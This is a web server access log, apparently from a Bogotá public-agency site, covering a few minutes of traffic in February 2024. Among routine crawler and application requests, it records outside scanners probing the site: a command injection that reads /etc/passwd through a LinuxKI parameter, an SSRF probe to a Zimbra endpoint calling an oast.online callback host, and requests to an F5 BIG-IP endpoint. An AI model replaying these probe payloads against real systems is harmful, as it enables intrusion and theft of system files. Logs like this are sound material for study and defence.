190.158.201.175 - - [28/Feb/2024:02:11:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Feb/2024:02:11:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
66.249.66.19 - - [28/Feb/2024:02:11:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5342.pdf HTTP/1.1" 200 503351
201.245.192.253 - - [28/Feb/2024:02:11:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:02:11:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Feb/2024:02:10:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [28/Feb/2024:02:12:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.120.219.139 - - [28/Feb/2024:02:13:09 -0500] "\x16\x03\x01" 400 226
66.249.79.131 - - [28/Feb/2024:02:13:25 -0500] "GET /mas-de-100-arboles-fueron-plantados-en-el-humedal-de-techo.html HTTP/1.1" 200 750
59.120.219.139 - - [28/Feb/2024:02:13:29 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:02:13:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.120.219.139 - - [28/Feb/2024:02:14:00 -0500] "\x16\x03\x01" 400 226
59.120.219.139 - - [28/Feb/2024:02:14:02 -0500] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:02:14:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.120.219.139 - - [28/Feb/2024:02:15:31 -0500] "POST /session/create HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:02:15:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:16:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:16:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
172.22.2.4 - - [28/Feb/2024:02:15:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Feb/2024:02:16:59 -0500] "HEAD / HTTP/1.1" 200 -
123.252.48.79 - - [28/Feb/2024:02:17:12 -0500] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 1035
157.55.39.54 - - [28/Feb/2024:02:17:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0298.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Feb/2024:02:16:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [28/Feb/2024:02:17:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:18:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.132 - - [28/Feb/2024:02:18:12 -0500] "GET /calidad-del-aire-de-bogota-influenciada-por-factores-externos-e-inversiones-termicas.html HTTP/1.1" 200 775
123.252.48.79 - - [28/Feb/2024:02:18:53 -0500] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cneqhp1enjjce7r1g3tgaoa4exh6c8hc5.oast.online%23 HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:02:19:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39465
201.245.192.253 - - [28/Feb/2024:02:19:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33539
201.245.192.253 - - [28/Feb/2024:02:19:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39611
